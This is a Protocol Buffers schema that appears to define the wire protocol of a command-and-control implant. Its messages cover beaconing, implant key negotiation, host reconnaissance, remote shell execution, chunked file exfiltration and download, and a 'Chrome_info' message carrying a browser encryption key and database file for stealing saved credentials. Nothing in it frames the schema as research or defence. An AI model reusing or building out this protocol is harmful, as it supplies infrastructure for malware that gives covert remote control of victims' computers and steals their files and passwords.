syntax = "proto3";

message Beacon_pulse {
  string guid = 1;
  // int32 current_task = 2; Not sure if I should add this
}

message Register {
  bytes client_pk_bin = 1;
}
message Key_negotiation_implant {
  bytes client_pk_bin = 1;
  string client_guid = 2;
}

message TaskRequest {
  string guid = 1;
  int32 Opcode = 2;
  string Args = 3;
}

message InfoGather {
  string guid = 1;
  string username = 2;
  string windows = 3;
  string productname = 4;
  string CPU = 5;
  string devicename = 6;
  string mem = 7;
}

message TaskResponse {
  string guid = 1;
  int32  Opcode = 2;
  string response = 3;
  string additional = 4;  // Add additional supported command here
}

message Message_encrypt {
  string guid = 1;  // The ephemeral (One time use) guid
  bytes ciphertext = 2;
}

message Message_encrypt_large {
  string guid_ephmeral = 1;  // The ephemeral (One time use) guid
  bytes ciphertext = 2;
}

message Shell_execution {
  string guid = 1;
  string command = 2;
  string result = 3;
}

message FileStream {
  string guid = 1;
  int32  order = 2;
  string filename = 3;
  int64  fileSize = 4;
  int32  actualRead = 5;
  bytes  chunk = 6;
}

message File_Download_Response {
  int32  order = 1;
  string filename = 2;
  int64  chunkSize = 3;
  int64  fileSize = 4;
  bytes  chunk = 6;
}

message File_Download_Request {
  string guid = 1;
  string filename = 2;
  int32  order = 3;
}

message Chrome_info {
  string guid = 1;
  string enc_key = 2;
  bytes dbfile = 3;
}